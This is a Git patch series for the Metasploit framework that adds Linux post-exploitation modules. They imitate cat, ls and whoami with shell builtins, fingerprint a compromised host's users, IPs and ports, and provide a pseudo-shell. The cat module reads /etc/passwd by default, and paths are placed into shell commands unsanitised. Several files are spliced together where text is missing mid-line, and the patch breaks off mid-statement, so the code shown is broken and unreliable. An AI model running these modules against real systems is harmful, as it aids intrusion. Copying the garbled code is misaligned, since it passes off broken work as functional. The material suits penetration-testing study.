From c9a4cc47f7bd5afa2b4d42c34c894fdeab2ab5a5 Mon Sep 17 00:00:00 2001 From: root Date: Thu, 31 May 2018 18:05:33 +0200 Subject: [PATCH 01/21] Initial upload of Vulnerateca Post-Exploitation Framework (VPEF) --- lib/msf/core/post/linux.rb | 3 + .../post/linux/vpef/vpef_core_commands.rb | 70 ++++++++ .../core/post/linux/vpef/vpef_core_common.rb | 45 ++++++ .../linux/vpef/vpef_core_fingerprinting.rb | 149 ++++++++++++++++++ modules/post/linux/vpef/vpef_cat.rb | 37 +++++ .../post/linux/vpef/vpef_fingerprinting.rb | 80 ++++++++++ modules/post/linux/vpef/vpef_ls.rb | 41 +++++ 7 files changed, 425 insertions(+) create mode 100644 lib/msf/core/post/linux/vpef/vpef_core_commands.rb create mode 100644 lib/msf/core/post/linux/vpef/vpef_core_common.rb create mode 100644 lib/msf/core/post/linux/vpef/vpef_core_fingerprinting.rb create mode 100644 modules/post/linux/vpef/vpef_cat.rb create mode 100644 modules/post/linux/vpef/vpef_fingerprinting.rb create mode 100644 modules/post/linux/vpef/vpef_ls.rb diff --git a/lib/msf/core/post/linux.rb b/lib/msf/core/post/linux.rb index 7ac85b867c8b..35be5edfc971 100644 --- a/lib/msf/core/post/linux.rb +++ b/lib/msf/core/post/linux.rb @@ -4,4 +4,7 @@ module Msf::Post::Linux require 'msf/core/post/linux/system' require 'msf/core/post/linux/kernel' require 'msf/core/post/linux/busy_box' + require 'msf/core/post/linux/vpef/vpef_core_commands' + require 'msf/core/post/linux/vpef/vpef_core_common' + require 'msf/core/post/linux/vpef/vpef_core_fingerprinting' end diff --git a/lib/msf/core/post/linux/vpef/vpef_core_commands.rb b/lib/msf/core/post/linux/vpef/vpef_core_commands.rb new file mode 100644 index 000000000000..936d5c637750 --- /dev/null +++ b/lib/msf/core/post/linux/vpef/vpef_core_commands.rb @@ -0,0 +1,70 @@ +# -*- coding: binary -*- + +require 'msf/core' + +module Msf +class Post +module Linux +module Vulnerateca + + include ::Msf::Post::Common + include ::Msf::Post::File + + def vulnerateca_ls(d) + result = vulnerateca_list_directory(d) + return result + end + + def vulnerateca_cat(f) + result = vulnerateca_read_file(f) + return result + end + + def vulnerateca_pwd() + result = [] + str_pwd = cmd_exec("echo $PWD") + result.insert(-1,str_pwd) + return result + end + + def vulnerateca_uniq(list) + uniq_list = [] + list.each do |elem| + if not uniq_list.include?(elem) + uniq_list.insert(-1, elem) + end + end + return uniq_list + end + + def vulnerateca_whoami() + result = [] + shellpid = vulnerateca_shell_pid() + statuspid = vulnerateca_pid_uid(shellpid) + + statuspid.each do |line| + split = line.split(":") + if split[0] == "Uid" + regex = /.*\s(.*)\s/ + useridtmp = split[1] + userid = useridtmp[regex, 1] + uid = userid.to_s + passwd = vulnerateca_read_file("/etc/passwd") + passwd.each do |line| + parts = line.split(":") + uid_passwd = parts[2].to_s + user = parts[0].to_s + if uid_passwd == uid + result.insert(-1,user) + return result + end + end + end + end + return "Error en funcion whoami" + end + +end # Vulnerateca +end # Linux +end # Post +end # Msf diff --git a/lib/msf/core/post/linux/vpef/vpef_core_common.rb b/lib/msf/core/post/linux/vpef/vpef_core_common.rb new file mode 100644 index 000000000000..9507eb8b02d2 --- /dev/null +++ b/lib/msf/core/post/linux/vpef/vpef_core_common.rb @@ -0,0 +1,45 @@ +# -*- coding: binary -*- + +require 'msf/core' + +module Msf +class Post +module Linux +module Vulnerateca + + include ::Msf::Post::Common + include ::Msf::Post::File + + def vulnerateca_read_file(f) + result = [] + str_file = cmd_exec("while read line; do echo $line; done <#{f}") + parts = str_file.split("\n") + parts.each do |line| + line = line.strip() + result.insert(-1,line) + end + return result + end + + def vulnerateca_list_directory(d) + result = [] + if d == "" + d = vulnerateca_pwd()[0] + "/" + elsif d[-1] == '/' + d = d + else + d = d + "/" + end + str_ls = cmd_exec("for fn in #{d}*; do echo $fn; done") + parts = str_ls.split("\n") + parts.each do |line| + line = line.strip() + result.insert(-1,line) + end + return result + end + +end # Vulnerateca +end # Linux +end # Post +end # Msf diff --git a/lib/msf/core/post/linux/vpef/vpef_core_fingerprinting.rb b/lib/msf/core/post/linux/vpef/vpef_core_fingerprinting.rb new file mode 100644 index 000000000000..282e45353ea2 --- /dev/null +++ b/lib/msf/core/post/linux/vpef/vpef_core_fingerprinting.rb @@ -0,0 +1,149 @@ +# -*- coding: binary -*- + +require 'msf/core' + +module Msf +class Post +module Linux +module Vulnerateca + + include ::Msf::Post::Common + include ::Msf::Post::File + + def vulnerateca_users() + result = [] + str_users = cmd_exec("while read line; do echo $line; done 'Vulnerateca Read File (cat without cat)', + 'Description' => %q{ + This module will be applied on a session connected to a shell. It will + extract content from a given. + }, + 'Author' => 'Alberto Rafael Rodriguez Iglesias ', + 'License' => MSF_LICENSE, + 'Platform' => ['linux'], + 'SessionTypes' => ['shell'] + ) + register_options( + [ + OptString.new('FILENAME', [true, 'File path to read, default /etc/passwd','/etc/passwd']) + ]) + end + + def run + file = datastore['FILENAME'] + print_status("Doing cat without cat command in FILENAME: #{file}") + cat_result=vulnerateca_cat(file) + cat_result.each do |line| + print_line(line) + end + print_line("\n") + end +end diff --git a/modules/post/linux/vpef/vpef_fingerprinting.rb b/modules/post/linux/vpef/vpef_fingerprinting.rb new file mode 100644 index 000000000000..60ecba3b4f40 --- /dev/null +++ b/modules/post/linux/vpef/vpef_fingerprinting.rb @@ -0,0 +1,80 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Post + include Msf::Post::File + include Msf::Post::Linux::Vulnerateca + + def initialize + super( + 'Name' => 'Vulnerateca Fingerprinting Module', + 'Description' => %q{ + This module will be applied on a session connected to a shell. It will + extract different information from target system. + }, + 'Author' => 'Alberto Rafael Rodriguez Iglesias ', + 'License' => MSF_LICENSE, + 'Platform' => ['linux'], + 'SessionTypes' => ['shell'] + ) + end + + def run + print_status(" -- Session Information --") + print "Current Shell: " + vulnerateca_shell()[0] + current_user = vulnerateca_whoami()[0] + print "\nCurrent User: " + current_user + print "\nIs Current User root?: " + vulnerateca_isroot?(current_user)[0] + print "\nCurrent Shell PID: " + vulnerateca_shell_pid().to_s + print "\n" + print "\n" + + print_status(" -- System Information --") + print "Current PATH env ($PATH): " + vulnerateca_path()[0] + print "\n" + print "\n" + + print_status(" -- Network Information --") + print "\n" + print_good("List of local IPs:") + ips = vulnerateca_ips() + ips.each do |ip| + print "\n" + ip + end + + print "\n" + print "\n" + print_good("List of local network interfaces:") + ifaces = vulnerateca_interfaces() + ifaces.each do |iface| + print "\n" + iface + end + + print "\n" + print "\n" + print_good("List of local MAC addresses:") + macs = vulnerateca_macs() + macs.each do |mac| + print "\n" +mac + end + + print "\n" + print "\n" + print_good("List of listening TCP ports:") + tcp_ports = vulnerateca_listen_tcp_ports() + tcp_ports.each do |tcp_port| + print "\n" + tcp_port.to_s + end + + print "\n" + print "\n" + print_good("List of listening UDP ports:") + udp_ports = vulnerateca_listen_udp_ports() + udp_ports.each do |udp_port| + print udp_port.to_s + "\n" + end + print "\n" + end +end diff --git a/modules/post/linux/vpef/vpef_ls.rb b/modules/post/linux/vpef/vpef_ls.rb new file mode 100644 index 000000000000..cbf4f1faed9e --- /dev/null +++ b/modules/post/linux/vpef/vpef_ls.rb @@ -0,0 +1,41 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Post + include Msf::Post::File + include Msf::Post::Linux::Vulnerateca + + def initialize + super( + 'Name' => 'Vulnerateca List Directory (ls without ls)', + 'Description' => %q{ + This module will be applied on a session connected to a shell. It will + extract a list of files and folders on a given dir. + }, + 'Author' => 'Alberto Rafael Rodriguez Iglesias ', + 'License' => MSF_LICENSE, + 'Platform' => ['linux'], + 'SessionTypes' => ['shell'] + ) + register_options( + [ + OptString.new('DIR', [false, 'Optional directory name to list, default current session path','']) + ]) + end + + def run + dir = datastore['DIR'] + if dir == "" + print_status("Doing ls without ls command in current session path DIR") + else + print_status("Doing ls without ls command in DIR: #{dir}") + end + ls_result=vulnerateca_ls(dir) + ls_result.each do |line| + print_line(line) + end + print_line("\n") + end +end From 6df8e28f7ef59d59ce05fde1204a6ea7c2d9c0f7 Mon Sep 17 00:00:00 2001 From: root Date: Fri, 1 Jun 2018 02:06:25 +0200 Subject: [PATCH 02/21] Some syntax fixes and name changes --- lib/msf/core/post/linux.rb | 6 +- .../pepa_core_commands.rb} | 28 +++---- .../pepa_core_common.rb} | 17 ++-- .../pepa_core_fingerprinting.rb} | 80 +++++++++---------- .../{vpef/vpef_cat.rb => pepa/pepa_cat.rb} | 10 +-- .../pepa_fingerprinting.rb} | 28 +++---- .../{vpef/vpef_ls.rb => pepa/pepa_ls.rb} | 14 ++-- 7 files changed, 89 insertions(+), 94 deletions(-) rename lib/msf/core/post/linux/{vpef/vpef_core_commands.rb => pepa/pepa_core_commands.rb} (72%) rename lib/msf/core/post/linux/{vpef/vpef_core_common.rb => pepa/pepa_core_common.rb} (78%) rename lib/msf/core/post/linux/{vpef/vpef_core_fingerprinting.rb => pepa/pepa_core_fingerprinting.rb} (69%) rename modules/post/linux/{vpef/vpef_cat.rb => pepa/pepa_cat.rb} (82%) rename modules/post/linux/{vpef/vpef_fingerprinting.rb => pepa/pepa_fingerprinting.rb} (71%) rename modules/post/linux/{vpef/vpef_ls.rb => pepa/pepa_ls.rb} (65%) diff --git a/lib/msf/core/post/linux.rb b/lib/msf/core/post/linux.rb index 35be5edfc971..121f18e7fe2f 100644 --- a/lib/msf/core/post/linux.rb +++ b/lib/msf/core/post/linux.rb @@ -4,7 +4,7 @@ module Msf::Post::Linux require 'msf/core/post/linux/system' require 'msf/core/post/linux/kernel' require 'msf/core/post/linux/busy_box' - require 'msf/core/post/linux/vpef/vpef_core_commands' - require 'msf/core/post/linux/vpef/vpef_core_common' - require 'msf/core/post/linux/vpef/vpef_core_fingerprinting' + require 'msf/core/post/linux/pepa/pepa_core_commands' + require 'msf/core/post/linux/pepa/pepa_core_common' + require 'msf/core/post/linux/pepa/pepa_core_fingerprinting' end diff --git a/lib/msf/core/post/linux/vpef/vpef_core_commands.rb b/lib/msf/core/post/linux/pepa/pepa_core_commands.rb similarity index 72% rename from lib/msf/core/post/linux/vpef/vpef_core_commands.rb rename to lib/msf/core/post/linux/pepa/pepa_core_commands.rb index 936d5c637750..36126b9ba66a 100644 --- a/lib/msf/core/post/linux/vpef/vpef_core_commands.rb +++ b/lib/msf/core/post/linux/pepa/pepa_core_commands.rb @@ -1,33 +1,32 @@ # -*- coding: binary -*- - require 'msf/core' module Msf class Post module Linux -module Vulnerateca +module Pepa include ::Msf::Post::Common include ::Msf::Post::File - def vulnerateca_ls(d) - result = vulnerateca_list_directory(d) + def pepa_ls(d) + result = pepa_list_directory(d) return result end - def vulnerateca_cat(f) - result = vulnerateca_read_file(f) + def pepa_cat(f) + result = pepa_read_file(f) return result end - def vulnerateca_pwd() + def pepa_pwd() result = [] str_pwd = cmd_exec("echo $PWD") result.insert(-1,str_pwd) return result end - def vulnerateca_uniq(list) + def pepa_uniq(list) uniq_list = [] list.each do |elem| if not uniq_list.include?(elem) @@ -37,11 +36,10 @@ def vulnerateca_uniq(list) return uniq_list end - def vulnerateca_whoami() + def pepa_whoami() result = [] - shellpid = vulnerateca_shell_pid() - statuspid = vulnerateca_pid_uid(shellpid) - + shellpid = pepa_shell_pid() + statuspid = pepa_pid_uid(shellpid) statuspid.each do |line| split = line.split(":") if split[0] == "Uid" @@ -49,7 +47,7 @@ def vulnerateca_whoami() useridtmp = split[1] userid = useridtmp[regex, 1] uid = userid.to_s - passwd = vulnerateca_read_file("/etc/passwd") + passwd = pepa_read_file("/etc/passwd") passwd.each do |line| parts = line.split(":") uid_passwd = parts[2].to_s @@ -61,10 +59,10 @@ def vulnerateca_whoami() end end end - return "Error en funcion whoami" + return "Whoami function error" end -end # Vulnerateca +end # Pepa end # Linux end # Post end # Msf diff --git a/lib/msf/core/post/linux/vpef/vpef_core_common.rb b/lib/msf/core/post/linux/pepa/pepa_core_common.rb similarity index 78% rename from lib/msf/core/post/linux/vpef/vpef_core_common.rb rename to lib/msf/core/post/linux/pepa/pepa_core_common.rb index 9507eb8b02d2..580eee13647a 100644 --- a/lib/msf/core/post/linux/vpef/vpef_core_common.rb +++ b/lib/msf/core/post/linux/pepa/pepa_core_common.rb @@ -1,34 +1,33 @@ # -*- coding: binary -*- - require 'msf/core' module Msf class Post module Linux -module Vulnerateca +module Pepa include ::Msf::Post::Common include ::Msf::Post::File - def vulnerateca_read_file(f) + def pepa_read_file(f) result = [] str_file = cmd_exec("while read line; do echo $line; done <#{f}") parts = str_file.split("\n") parts.each do |line| - line = line.strip() + line = line.strip() result.insert(-1,line) end return result end - def vulnerateca_list_directory(d) + def pepa_list_directory(d) result = [] if d == "" - d = vulnerateca_pwd()[0] + "/" + d = pepa_pwd()[0] + "/" elsif d[-1] == '/' - d = d + d = d else - d = d + "/" + d = d + "/" end str_ls = cmd_exec("for fn in #{d}*; do echo $fn; done") parts = str_ls.split("\n") @@ -39,7 +38,7 @@ def vulnerateca_list_directory(d) return result end -end # Vulnerateca +end # Pepa end # Linux end # Post end # Msf diff --git a/lib/msf/core/post/linux/vpef/vpef_core_fingerprinting.rb b/lib/msf/core/post/linux/pepa/pepa_core_fingerprinting.rb similarity index 69% rename from lib/msf/core/post/linux/vpef/vpef_core_fingerprinting.rb rename to lib/msf/core/post/linux/pepa/pepa_core_fingerprinting.rb index 282e45353ea2..7a86755e121a 100644 --- a/lib/msf/core/post/linux/vpef/vpef_core_fingerprinting.rb +++ b/lib/msf/core/post/linux/pepa/pepa_core_fingerprinting.rb @@ -1,28 +1,27 @@ # -*- coding: binary -*- - require 'msf/core' module Msf class Post module Linux -module Vulnerateca +module Pepa include ::Msf::Post::Common include ::Msf::Post::File - def vulnerateca_users() + def pepa_users() result = [] str_users = cmd_exec("while read line; do echo $line; done 'Vulnerateca Read File (cat without cat)', + 'Name' => 'PEPA Read File (cat without cat)', 'Description' => %q{ This module will be applied on a session connected to a shell. It will - extract content from a given. + extract content from a given file. }, 'Author' => 'Alberto Rafael Rodriguez Iglesias ', 'License' => MSF_LICENSE, @@ -28,9 +28,9 @@ def initialize def run file = datastore['FILENAME'] print_status("Doing cat without cat command in FILENAME: #{file}") - cat_result=vulnerateca_cat(file) + cat_result=pepa_cat(file) cat_result.each do |line| - print_line(line) + print_line(line) end print_line("\n") end diff --git a/modules/post/linux/vpef/vpef_fingerprinting.rb b/modules/post/linux/pepa/pepa_fingerprinting.rb similarity index 71% rename from modules/post/linux/vpef/vpef_fingerprinting.rb rename to modules/post/linux/pepa/pepa_fingerprinting.rb index 60ecba3b4f40..620c2f7aa38a 100644 --- a/modules/post/linux/vpef/vpef_fingerprinting.rb +++ b/modules/post/linux/pepa/pepa_fingerprinting.rb @@ -5,11 +5,11 @@ class MetasploitModule < Msf::Post include Msf::Post::File - include Msf::Post::Linux::Vulnerateca + include Msf::Post::Linux::Pepa def initialize super( - 'Name' => 'Vulnerateca Fingerprinting Module', + 'Name' => 'PEPA Fingerprinting Module', 'Description' => %q{ This module will be applied on a session connected to a shell. It will extract different information from target system. @@ -23,31 +23,31 @@ def initialize def run print_status(" -- Session Information --") - print "Current Shell: " + vulnerateca_shell()[0] - current_user = vulnerateca_whoami()[0] + print "Current Shell: " + pepa_shell()[0] + current_user = pepa_whoami()[0] print "\nCurrent User: " + current_user - print "\nIs Current User root?: " + vulnerateca_isroot?(current_user)[0] - print "\nCurrent Shell PID: " + vulnerateca_shell_pid().to_s + print "\nIs Current User root?: " + pepa_isroot?(current_user)[0] + print "\nCurrent Shell PID: " + pepa_shell_pid().to_s print "\n" print "\n" print_status(" -- System Information --") - print "Current PATH env ($PATH): " + vulnerateca_path()[0] + print "Current PATH env ($PATH): " + pepa_path()[0] + print "\n" print "\n" - print "\n" print_status(" -- Network Information --") print "\n" print_good("List of local IPs:") - ips = vulnerateca_ips() + ips = pepa_ips() ips.each do |ip| - print "\n" + ip + print "\n" + ip end print "\n" print "\n" print_good("List of local network interfaces:") - ifaces = vulnerateca_interfaces() + ifaces = pepa_interfaces() ifaces.each do |iface| print "\n" + iface end @@ -55,7 +55,7 @@ def run print "\n" print "\n" print_good("List of local MAC addresses:") - macs = vulnerateca_macs() + macs = pepa_macs() macs.each do |mac| print "\n" +mac end @@ -63,7 +63,7 @@ def run print "\n" print "\n" print_good("List of listening TCP ports:") - tcp_ports = vulnerateca_listen_tcp_ports() + tcp_ports = pepa_listen_tcp_ports() tcp_ports.each do |tcp_port| print "\n" + tcp_port.to_s end @@ -71,7 +71,7 @@ def run print "\n" print "\n" print_good("List of listening UDP ports:") - udp_ports = vulnerateca_listen_udp_ports() + udp_ports = pepa_listen_udp_ports() udp_ports.each do |udp_port| print udp_port.to_s + "\n" end diff --git a/modules/post/linux/vpef/vpef_ls.rb b/modules/post/linux/pepa/pepa_ls.rb similarity index 65% rename from modules/post/linux/vpef/vpef_ls.rb rename to modules/post/linux/pepa/pepa_ls.rb index cbf4f1faed9e..fb56fa5429f3 100644 --- a/modules/post/linux/vpef/vpef_ls.rb +++ b/modules/post/linux/pepa/pepa_ls.rb @@ -5,16 +5,16 @@ class MetasploitModule < Msf::Post include Msf::Post::File - include Msf::Post::Linux::Vulnerateca + include Msf::Post::Linux::Pepa def initialize super( - 'Name' => 'Vulnerateca List Directory (ls without ls)', + 'Name' => 'PEPA List Directory (ls without ls)', 'Description' => %q{ This module will be applied on a session connected to a shell. It will extract a list of files and folders on a given dir. }, - 'Author' => 'Alberto Rafael Rodriguez Iglesias ', + 'Author' => 'Alberto Rafael Rodriguez Iglesias ', 'License' => MSF_LICENSE, 'Platform' => ['linux'], 'SessionTypes' => ['shell'] @@ -28,13 +28,13 @@ def initialize def run dir = datastore['DIR'] if dir == "" - print_status("Doing ls without ls command in current session path DIR") + print_status("Doing ls without ls command in current session path DIR") else - print_status("Doing ls without ls command in DIR: #{dir}") + print_status("Doing ls without ls command in DIR: #{dir}") end - ls_result=vulnerateca_ls(dir) + ls_result=pepa_ls(dir) ls_result.each do |line| - print_line(line) + print_line(line) end print_line("\n") end From 96cd65a205ed83e83eb8905c19b4ee2e6426af4e Mon Sep 17 00:00:00 2001 From: AlbertoCoding Date: Fri, 1 Jun 2018 02:57:03 +0200 Subject: [PATCH 03/21] Added new whoami module and some fixes --- modules/post/linux/pepa/pepa_cat.rb | 1 - modules/post/linux/pepa/pepa_ls.rb | 3 +-- modules/post/linux/pepa/pepa_whoami.rb | 29 ++++++++++++++++++++++++++ 3 files changed, 30 insertions(+), 3 deletions(-) create mode 100644 modules/post/linux/pepa/pepa_whoami.rb diff --git a/modules/post/linux/pepa/pepa_cat.rb b/modules/post/linux/pepa/pepa_cat.rb index ba991f719d7e..dd36f73ee965 100644 --- a/modules/post/linux/pepa/pepa_cat.rb +++ b/modules/post/linux/pepa/pepa_cat.rb @@ -32,6 +32,5 @@ def run cat_result.each do |line| print_line(line) end - print_line("\n") end end diff --git a/modules/post/linux/pepa/pepa_ls.rb b/modules/post/linux/pepa/pepa_ls.rb index fb56fa5429f3..dcd292026319 100644 --- a/modules/post/linux/pepa/pepa_ls.rb +++ b/modules/post/linux/pepa/pepa_ls.rb @@ -30,12 +30,11 @@ def run if dir == "" print_status("Doing ls without ls command in current session path DIR") else - print_status("Doing ls without ls command in DIR: #{dir}") + print_status("Doing ls without ls command in DIR: #{dir}") end ls_result=pepa_ls(dir) ls_result.each do |line| print_line(line) end - print_line("\n") end end diff --git a/modules/post/linux/pepa/pepa_whoami.rb b/modules/post/linux/pepa/pepa_whoami.rb new file mode 100644 index 000000000000..f0df4534b20c --- /dev/null +++ b/modules/post/linux/pepa/pepa_whoami.rb @@ -0,0 +1,29 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Post + include Msf::Post::File + include Msf::Post::Linux::Pepa + + def initialize + super( + 'Name' => 'PEPA Whoami (whoami without whoami)', + 'Description' => %q{ + This module will be applied on a session connected to a shell. It will + extract current username. + }, + 'Author' => 'Alberto Rafael Rodriguez Iglesias ', + 'License' => MSF_LICENSE, + 'Platform' => ['linux'], + 'SessionTypes' => ['shell'] + ) + end + + def run + print_status("Doing whoami without whoami command") + whoami_result=pepa_whoami()[0] + print_line(whoami_result) + end +end From be1ea1549e0f224c71cd01beef389391f862957f Mon Sep 17 00:00:00 2001 From: AlbertoCoding Date: Tue, 19 Jun 2018 12:39:41 +0200 Subject: [PATCH 04/21] Post-exploitation API improvements and pseudo_shell module added --- lib/msf/core/post/file.rb | 41 +++-- lib/msf/core/post/linux.rb | 3 - .../post/linux/pepa/pepa_core_commands.rb | 68 -------- .../core/post/linux/pepa/pepa_core_common.rb | 44 ----- .../linux/pepa/pepa_core_fingerprinting.rb | 147 ---------------- lib/msf/core/post/linux/priv.rb | 37 ++-- lib/msf/core/post/linux/system.rb | 148 +++++++++++++++- lib/msf/core/post/unix.rb | 30 +++- modules/post/linux/manage/pseudo_shell.rb | 159 ++++++++++++++++++ modules/post/linux/pepa/pepa_cat.rb | 36 ---- .../post/linux/pepa/pepa_fingerprinting.rb | 80 --------- modules/post/linux/pepa/pepa_ls.rb | 40 ----- modules/post/linux/pepa/pepa_whoami.rb | 29 ---- 13 files changed, 387 insertions(+), 475 deletions(-) delete mode 100644 lib/msf/core/post/linux/pepa/pepa_core_commands.rb delete mode 100644 lib/msf/core/post/linux/pepa/pepa_core_common.rb delete mode 100644 lib/msf/core/post/linux/pepa/pepa_core_fingerprinting.rb create mode 100644 modules/post/linux/manage/pseudo_shell.rb delete mode 100644 modules/post/linux/pepa/pepa_cat.rb delete mode 100644 modules/post/linux/pepa/pepa_fingerprinting.rb delete mode 100644 modules/post/linux/pepa/pepa_ls.rb delete mode 100644 modules/post/linux/pepa/pepa_whoami.rb diff --git a/lib/msf/core/post/file.rb b/lib/msf/core/post/file.rb index f931379de410..a27b8eff92b4 100644 --- a/lib/msf/core/post/file.rb +++ b/lib/msf/core/post/file.rb @@ -32,7 +32,12 @@ def pwd # and 2k return session.shell_command_token("echo %CD%") else - return session.shell_command_token("pwd") + if command_exists?("pwd") + return session.shell_command_token("pwd") + else + # Result on systems without pwd command + return session.shell_command_token("echo $PWD") + end end end end @@ -47,7 +52,22 @@ def dir(directory) if session.platform == 'windows' return session.shell_command_token("dir #{directory}").split(/[\r\n]+/) else - return session.shell_command_token("ls #{directory}").split(/[\r\n]+/) + if command_exists?("ls") + return session.shell_command_token("ls #{directory}").split(/[\r\n]+/) + else + # Result on systems without ls command + if directory[-1] != '/' + directory = directory + "/" + end + result = [] + data = session.shell_command_token("for fn in #{directory}*; do echo $fn; done") + parts = data.split("\n") + parts.each do |line| + line = line.split("/")[-1] + result.insert(-1,line) + end + return result + end end end end @@ -69,7 +89,6 @@ def directory?(path) else f = session.shell_command_token("test -d \"#{path}\" && echo true") end - return false if f.nil? || f.empty? return false unless f =~ /true/ true @@ -106,7 +125,6 @@ def file?(path) else f = session.shell_command_token("test -f \"#{path}\" && echo true") end - return false if f.nil? || f.empty? return false unless f =~ /true/ true @@ -128,7 +146,6 @@ def setuid?(path) if session.platform != 'windows' f = session.shell_command_token("test -u \"#{path}\" && echo true") end - return false if f.nil? || f.empty? return false unless f =~ /true/ true @@ -149,7 +166,6 @@ def exist?(path) else f = cmd_exec("test -e \"#{path}\" && echo true") end - return false if f.nil? || f.empty? return false unless f =~ /true/ true @@ -168,7 +184,6 @@ def file_local_write(local_file_name, data) unless ::File.exist?(local_file_name) ::FileUtils.touch(local_file_name) end - output = ::File.open(local_file_name, "a") data.each_line do |d| output.puts(d) @@ -275,6 +290,9 @@ def file_remote_digestsha2(file_name) # # @param file_name [String] Remote file name to read # @return [String] Contents of the file + # + # @return [Array] of strings(lines) + # def read_file(file_name) data = nil if session.type == "meterpreter" @@ -283,7 +301,12 @@ def read_file(file_name) if session.platform == 'windows' data = session.shell_command_token("type \"#{file_name}\"") else - data = session.shell_command_token("cat \"#{file_name}\"") + if command_exists?("cat") + data = session.shell_command_token("cat \"#{file_name}\"") + else + # Result on systems without cat command + data = session.shell_command_token("while read line; do echo $line; done <#{file_name}") + end end end @@ -308,7 +331,6 @@ def write_file(file_name, data) else _write_file_unix_shell(file_name, data) end - end true end @@ -387,7 +409,6 @@ def rm_rf(*remote_dirs) end end end - alias :file_rm :rm_f alias :dir_rm :rm_rf diff --git a/lib/msf/core/post/linux.rb b/lib/msf/core/post/linux.rb index 121f18e7fe2f..7ac85b867c8b 100644 --- a/lib/msf/core/post/linux.rb +++ b/lib/msf/core/post/linux.rb @@ -4,7 +4,4 @@ module Msf::Post::Linux require 'msf/core/post/linux/system' require 'msf/core/post/linux/kernel' require 'msf/core/post/linux/busy_box' - require 'msf/core/post/linux/pepa/pepa_core_commands' - require 'msf/core/post/linux/pepa/pepa_core_common' - require 'msf/core/post/linux/pepa/pepa_core_fingerprinting' end diff --git a/lib/msf/core/post/linux/pepa/pepa_core_commands.rb b/lib/msf/core/post/linux/pepa/pepa_core_commands.rb deleted file mode 100644 index 36126b9ba66a..000000000000 --- a/lib/msf/core/post/linux/pepa/pepa_core_commands.rb +++ /dev/null @@ -1,68 +0,0 @@ -# -*- coding: binary -*- -require 'msf/core' - -module Msf -class Post -module Linux -module Pepa - - include ::Msf::Post::Common - include ::Msf::Post::File - - def pepa_ls(d) - result = pepa_list_directory(d) - return result - end - - def pepa_cat(f) - result = pepa_read_file(f) - return result - end - - def pepa_pwd() - result = [] - str_pwd = cmd_exec("echo $PWD") - result.insert(-1,str_pwd) - return result - end - - def pepa_uniq(list) - uniq_list = [] - list.each do |elem| - if not uniq_list.include?(elem) - uniq_list.insert(-1, elem) - end - end - return uniq_list - end - - def pepa_whoami() - result = [] - shellpid = pepa_shell_pid() - statuspid = pepa_pid_uid(shellpid) - statuspid.each do |line| - split = line.split(":") - if split[0] == "Uid" - regex = /.*\s(.*)\s/ - useridtmp = split[1] - userid = useridtmp[regex, 1] - uid = userid.to_s - passwd = pepa_read_file("/etc/passwd") - passwd.each do |line| - parts = line.split(":") - uid_passwd = parts[2].to_s - user = parts[0].to_s - if uid_passwd == uid - result.insert(-1,user) - return result - end - end - end - end - return "Whoami function error" - end - -end # Pepa -end # Linux -end # Post -end # Msf diff --git a/lib/msf/core/post/linux/pepa/pepa_core_common.rb b/lib/msf/core/post/linux/pepa/pepa_core_common.rb deleted file mode 100644 index 580eee13647a..000000000000 --- a/lib/msf/core/post/linux/pepa/pepa_core_common.rb +++ /dev/null @@ -1,44 +0,0 @@ -# -*- coding: binary -*- -require 'msf/core' - -module Msf -class Post -module Linux -module Pepa - - include ::Msf::Post::Common - include ::Msf::Post::File - - def pepa_read_file(f) - result = [] - str_file = cmd_exec("while read line; do echo $line; done <#{f}") - parts = str_file.split("\n") - parts.each do |line| - line = line.strip() - result.insert(-1,line) - end - return result - end - - def pepa_list_directory(d) - result = [] - if d == "" - d = pepa_pwd()[0] + "/" - elsif d[-1] == '/' - d = d - else - d = d + "/" - end - str_ls = cmd_exec("for fn in #{d}*; do echo $fn; done") - parts = str_ls.split("\n") - parts.each do |line| - line = line.strip() - result.insert(-1,line) - end - return result - end - -end # Pepa -end # Linux -end # Post -end # Msf diff --git a/lib/msf/core/post/linux/pepa/pepa_core_fingerprinting.rb b/lib/msf/core/post/linux/pepa/pepa_core_fingerprinting.rb deleted file mode 100644 index 7a86755e121a..000000000000 --- a/lib/msf/core/post/linux/pepa/pepa_core_fingerprinting.rb +++ /dev/null @@ -1,147 +0,0 @@ -# -*- coding: binary -*- -require 'msf/core' - -module Msf -class Post -module Linux -module Pepa - - include ::Msf::Post::Common - include ::Msf::Post::File - - def pepa_users() - result = [] - str_users = cmd_exec("while read line; do echo $line; done 'Pseudo-Shell Post-Exploitation Module', + 'Description' => %q{ + This module will be for the run a Psudo-Shell. + }, + 'Author' => 'Alberto Rafael Rodriguez Iglesias ', + 'License' => MSF_LICENSE, + 'Platform' => ['linux'], + 'SessionTypes' => ['shell'] + ) + end + + def run + $vhostname = get_hostname + $vusername = whoami + prompt() + end + + def parse_cmd(cmd) + error = "" + parts = cmd.split(" ") + if parts.length() >= 1 + nargs = parts.length() - 1 + cmd = parts[0] + HELP_COMMANDS.each do |linea| + if linea[0] == cmd + func = linea[1] + if nargs >= 1 + if linea[2] == 1 + args = parts[1] + else + nargs = 0 + end + else + args = "" + end + return func, cmd, args, nargs + end + end + error = get_shell_name + message = error + ": " + cmd + ": Command not exist\n" + print message + return message + else + return error + end + end + + def help() + print "\n" + print "Commands Help\n" + print "==============\n" + print "\n" + printf("\t%-20s%-100s\n", "Command", "Description") + printf("\t%-20s%-100s\n", "-------", "-----------") + HELP_COMMANDS.each do |linea| + printf("\t%-20s%-100s\n", linea[0], linea[3]) + end + print "\n" + end + + def prompt_show() + promptshell = $vusername + "@" + $vhostname + ":" + pwd.strip() + "# " + comp = proc { |s| LIST.grep(/^#{Regexp.escape(s)}/) } + Readline.completion_append_character = " " + Readline.completion_proc = comp + input = Readline.readline(promptshell , true) + return nil if input.nil? + input + end + + def prompt() + while input = prompt_show + break if input == "exit" + break if input == "exit " + begin + func, command, args, nargs = parse_cmd(input) + nargs = nargs.to_i + if command == "ls" + if nargs == 0 + nargs = nargs + 1 + ruta = pwd + args = ruta + end + end + if nargs > 0 + args = args.strip() + resultado = public_send("#{func}", "#{args}") + else + if input == "" + resultado = [] + resultado.insert(-1,"") + else + resultado = public_send("#{func}") + end + end + if !!resultado == resultado + if command == "isroot?" + print resultado ? "true\n" : "false\n" + end + else + if 